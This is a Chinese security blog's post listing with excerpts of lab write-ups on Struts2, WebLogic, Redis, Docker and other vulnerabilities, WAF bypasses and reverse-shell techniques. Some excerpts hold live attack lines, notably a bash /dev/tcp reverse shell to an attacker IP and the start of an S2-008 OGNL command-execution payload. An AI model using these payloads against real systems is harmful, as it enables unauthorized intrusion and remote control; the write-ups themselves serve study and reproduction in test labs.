自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 收藏
  • 关注

原创 PbootCMS中利用php-parser绕过正则匹配进行代码执行

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言正则绕过方式前言在代码审计过程中碰见了一个非常有趣的绕过方式,在这里记录下,原文地址是[https://www.cnblogs.com/0daybug/p/13246744.html]正则绕过方式正则匹配是在函数名和括号之间插入控制字符,如\x01,这样即可绕过该处正则校验,并且可以正常执行php代码,该trick来源于KCon2019的一个议题具体做法是在函数()中间插入 \x00到\x20 变成 函数

2020-11-10 15:17:58 378

原创 python攻防-socket模块

记录下学python文章目录PYTHON 模块-socket常用的Socket方法编写案例PYTHON 模块-socketsocket模块是计算机之间进行通信的一套程序接口,相当于在发送端和接收端之间建立了一个通信管道,一些远程管理软件和网络安全软件大多依赖于socket实现特定功能,本文主要从TCP方面讲解并给出具体案例.常用的Socket方法connect():连接远程计算机send():发送数据recv():接受数据bind():绑定数据listen():开始监听,等待客户端连

2020-10-27 11:56:43 380

原创 weblogic-CVE-2018-2628

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录漏洞描述一、漏洞原理二、复现1.环境搭建利用参考文献漏洞描述Oracle官方在2018年4月18日凌晨发布了关键补丁更新,其中包含了Oracle WebLogic Server的一个高危的Weblogic反序列化漏洞,通过该漏洞,攻击者可以在未授权的情况下远程执行代码。此漏洞产生于Weblogic T3服务,当开放Weblogic控制台端口(默认为7001端口)时,T3服务会默认开启,因此会造成较大影响。结合曾经爆出的Web

2020-10-13 16:50:11 448

原创 weblogic中wls组件XMLDecode反序列化漏洞复现

文章目录漏洞原理复现漏洞原理Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。复现Kali docker 容器中启动此漏洞环境访问网页http://192.168.193.129:7001//wls-wsat/CoordinatorPortType响应结果为以下类型证明可能存在该漏洞getshell利用方式在本地监听666端口,执行命令为n

2020-10-12 17:39:15 297

原创 反弹shell常见方法总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹:前言记录并总结下常用到的各种反弹shell的姿势,方便以后使用环境:攻击机:windows,192.168.0.105服务器:kail,192.168.0.107一.Bash反弹首先在攻击机上执行nc -lvvp 3333进行监听在kail机上执行bash -i >& /dev/tcp/192.168.0.105/3333

2020-10-08 11:39:36 726

原创 sql注入绕waf总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、环境搭建?二、方法1.内联注释(/*![12345]*/)绕过方法:2.第二种绕过方法,内联注释另类思想绕过3.第三种绕过方法,%0a绕过4.第四种绕过方法,特殊的URL编码绕过安全狗5.url另类传参绕过6.垃圾数据填充前言总结下自己常用的sql注入绕waf方法一、环境搭建?windows 10 操作系统1,phpstudy20162,安全狗最新版,(切记以管理员身份启动安全狗)二、方法1.内联注释(/!

2020-10-07 22:38:28 683

原创 Apache Struts2远程代码执行漏洞(S2-009)复现总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、漏洞成因?二、复现1.环境搭建复现前言记录并复现下常见的struts2漏洞,加深理解一、漏洞成因?在修补了S2-003和S2-005之后,攻击者又发现了一种新的绕过ParametersInterceptor正则保护的攻击方式当传入(ONGL)(1)时,会将前者视为ONGL表达式来执行,从而绕过了正则的匹配保护。而且由于其在HTTP参数值中,也可以进一步绕过字符串限制的保护二、复现1.环境搭建因为墨者学院代币

2020-10-07 21:35:45 593

原创 Apache Struts2远程代码执行漏洞(S2-008)复现总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、漏洞原理2.复现前言记录并复现相关struts漏洞,加深理解一、漏洞原理主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式2.复现访问墨者学院strut2-008靶机构造poc,执行命令ls,查看文件。?debug=command&expression=%23context%5B%22xwork

2020-10-07 20:57:21 1634

原创 Apache Struts2远程代码执行漏洞(S2-004)复现总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、Apache Struts2远程代码执行漏洞(S2-004)复现漏洞原理漏洞复现前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考一、Apache Struts2远程代码执行漏洞(S2-004)复现在这里使用墨者学院的靶场进行复现漏洞原理Strut

2020-10-06 22:45:35 555

原创 Apache Struts2远程代码执行漏洞(S2-001)复现总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、Struts2远程代码执行漏洞(S2-001)复现检验方法利用漏洞进行命令执行前言为了加深对struts漏洞的理解,记录下复现struts漏洞的过程.一、Struts2远程代码执行漏洞(S2-001)复现在这里使用墨者学院的靶场进行复现检验方法在表格中输入%{1+1}看返回结果是否为2返回结果都为2,证明账户和密码表格处都存在这个漏洞利用漏洞进行命令执行输入以下代码进行命令执行%{#a=(new

2020-10-06 21:55:51 2080

原创 docker未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、docker未授权访问漏洞是什么?二、复现1.环境搭建2 漏洞利用前言记录并复现常见的未授权访问漏洞一、docker未授权访问漏洞是什么?Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。常见端口2375二、复现1.环境搭建如果访问如下页面,返回一个json格式的值{“message”:“page not found”}即存在漏洞也可以访问ip

2020-10-05 23:59:20 1387

原创 CouchDB 未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、CouchDB 未授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法前言复现常见的未授权访问漏洞 加强理解一、CouchDB 未授权访问漏洞是什么?Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其

2020-10-05 22:36:35 1115

原创 Jupyter Notebook 未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、Jupyter Notebook 未授权访问漏洞是什么?二、复现1.搭建环境漏洞利用三、防御方法前言记录并自己复现下常见的未授权访问漏洞一、Jupyter Notebook 未授权访问漏洞是什么?Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中

2020-10-05 21:31:49 1791

原创 Hadoop 未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、Hadoop 未授权访问漏洞是什么?二、复现1.搭建环境2.复现前言记录下常见的未授权访问漏洞一、Hadoop 未授权访问漏洞是什么?Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。二、复现1

2020-10-05 12:16:18 6053 1

原创 Elasticsearch 未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、ElasticSearch未授权访问是什么?二、复现1.搭建环境2.复现前言提示:这里可以添加本文要记录的大概内容:例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。提示:以下是本篇文章正文内容,下面案例可供参考一、ElasticSearch未授权访问是什么?ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多

2020-10-05 10:39:55 2712

原创 ZooKeeper未授权访问漏洞总结

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录前言一、ZooKeeper未授权访问漏洞?二、复现1.搭建环境2.检测方法POC编写前言总结下常见的未授权漏洞一、ZooKeeper未授权访问漏洞?ZooKeeper是一个分布式的、开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper默认开

2020-10-05 00:48:44 4164

转载 jenkins未授权访问漏洞总结

jenkins未授权访问漏洞复现0x00 漏洞描述未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。0x01 漏洞环境搭建(win10)官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io运行setup.exe,安装即可,安装成功后在任务管理器中运行jenkins服务之后访问http://localhost:8080即可0x0

2020-10-05 00:17:37 595

原创 redis未授权访问总结

这里写自定义目录标题Centos搭建redisApache和php安装redis未授权访问漏洞复现redis未授权访问利用getshell方式利用定时任务进行反弹shell写入webshell方式进行连接redis未授权访问的poc_*_ coding:utf-8 _*_Centos搭建redis首先,搭建redis,进行安装.以下为安装步骤:1下载安装包命令为wget http://download.redis.io/releases/redis-2.8.17.tar.gz2 tar xzvf

2020-10-04 16:31:49 316

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除